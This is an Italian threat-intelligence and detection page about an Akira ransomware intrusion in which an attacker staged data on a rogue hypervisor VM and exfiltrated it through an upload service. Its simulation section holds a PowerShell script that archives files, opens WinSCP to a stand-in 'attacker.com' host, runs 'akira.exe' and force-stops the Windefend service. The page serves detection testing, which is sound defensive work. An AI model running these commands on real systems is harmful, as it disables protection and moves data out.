Akira, LimeWire e l’Amaro Sapore dell’Esfiltrazione di Dati
Detection stack
- AIDR
- Alert
- ETL
- Query
Sintesi
Un affiliato del ransomware Akira ha ottenuto accesso non autorizzato a un hypervisor e ha creato una nuova macchina virtuale da utilizzare come ambiente di staging nascosto. L’attaccante si è affidato a questa VM isolata per evitare il monitoraggio della sicurezza, preparare i dati con WinRAR e esfiltrare gli archivi tramite la piattaforma di condivisione file Easyupload.io. Il caso dimostra come gli attori delle minacce continuino ad abusare dei servizi di upload legittimi per il furto di dati.
Indagine
L’indagine ha combinato la telemetria EDR, i registri degli eventi di Windows e la cronologia di navigazione di Microsoft Edge per ricostruire l’intrusione. Gli analisti hanno anche recuperato un’immagine VHDX della macchina virtuale canaglia, che ha rivelato l’attaccante disabilitare Microsoft Defender e configurare l’operazione del ransomware Akira. L’analisi forense della VM ha esposto gli strumenti esatti, i siti web e il flusso di lavoro utilizzati durante le fasi di staging ed esfiltrazione.
Mitigazione
Le organizzazioni dovrebbero monitorare l’apparizione di nuovi endpoint o istanze di macchine virtuali non autorizzate nel loro ambiente. È essenziale avere una forte visibilità nell’accesso remoto ai sistemi critici come hypervisor e controller di dominio. Inoltre, è importante restrictere o monitorare attentamente l’accesso a servizi di condivisione file e di upload rapido noti che possono essere utilizzati per l’esfiltrazione.
Risposta
Se viene identificato un accesso non autorizzato all’hypervisor, isolare immediatamente l’hypervisor colpito e le eventuali nuove macchine virtuali create. Eseguire un’analisi forense delle immagini del disco VM per determinare l’entità dello staging e dell’esfiltrazione dei dati. Esaminare i log di accesso per tracciare il punto di ingresso originale e confermare che non rimanga alcun accesso persistente dell’attaccante.
Flusso di attacco
Rilevamenti
LOLBAS Finger (tramite riga di comando)
Visualizza
Possibile infiltrazione/esfiltrazione di dati/C2 tramite servizi/strumenti di terze parti (tramite riga di comando)
Visualizza
Possibile infiltrazione/esfiltrazione di dati/C2 tramite servizi/strumenti di terze parti (tramite proxy)
Visualizza
Possibile infiltrazione/esfiltrazione di dati/C2 tramite servizi/strumenti di terze parti (tramite DNS)
Visualizza
Attacco ransomware Akira tramite nuova macchina virtuale e esfiltrazione dati [creazione processo Windows]
Visualizza
Esecuzione di simulazione
Prerequisito: il controllo pre-volo di Telemetria & Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecniche dell’avversario (TTP) progettate per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta richiesta dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrativa e Comandi dell’Attacco: L’avversario ha ottenuto l’accesso iniziale e cerca di aumentare l’impatto. Innanzitutto, enumerano i file sensibili controllando file di testo noti come
AdUsers.txt. Per prepararsi all’esfiltrazione, usanoWinRAR.exeper comprimere i dati. Preparano quindi il loro strumento di esfiltrazione,WinSCP.exe, e infine eseguono il payload del ransomwareakira.exe. Per impedire all’EDR/Antivirus di terminare il processo, tentano di fermare il servizioWindefend. Questa specifica sequenza di argomenti della riga di comando e cambiamenti dello stato del servizio è intesa a attivare la logica di rilevamento specifica di Akira. -
Script di Test di Regressione:
# Script di Simulazione per la Validazione del Ransomware Akira # NOTA: Questo script richiede privilegi amministrativi per interrompere il servizio Defender. Write-Host "[+] Inizio simulazione ransomware Akira..." -ForegroundColor Cyan # 1. Simulare Scoperta/Enumerazione (T1119) Write-Host "[+] Fase 1: Simulazione dell'enumerazione dei file tramite Blocco note..." Start-Process notepad.exe -ArgumentList "AdUsers.txt" Start-Sleep -Seconds 2 # 2. Simulare Archiviazione Dati (T1560.003) # Nota: Assumiamo che WinRAR sia presente o simuliamo l'attività della riga di comando Write-Host "[+] Fase 2: Simulazione archiviazione dati con WinRAR..." Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt" Start-Sleep -Seconds 2 # 3. Simulare Preparazione Strumento di Esfiltrazione (T1105) Write-Host "[+] Fase 3: Simulazione esecuzione strumento di esfiltrazione..." Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com" Start-Sleep -Seconds 2 # 4. Simulare Esecuzione di Ransomware (T1204.002) Write-Host "[+] Fase 4: Simulazione esecuzione payload Akira..." Start-Process "akira.exe" Start-Sleep -Seconds 2 # 5. Simulare Disabilitazione Defender (T1564.006) # Questo attiva EventID 7036 nel registro di sistema Write-Host "[+] Fase 5: Tentativo di fermare Microsoft Defender..." Stop-Service -Name "Windefend" -Force Write-Host "[+] Simulazione completa. Controlla il SIEM per gli avvisi." -ForegroundColor Green -
Comandi di Pulizia:
# Script di Pulizia Write-Host "[+] Pulizia di artefatti di simulazione..." -ForegroundColor Cyan # Riavviare il servizio Defender Start-Service -Name "Windefend" # Rimuovere file simulati Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue Write-Host "[+] Pulizia completata." -ForegroundColor Green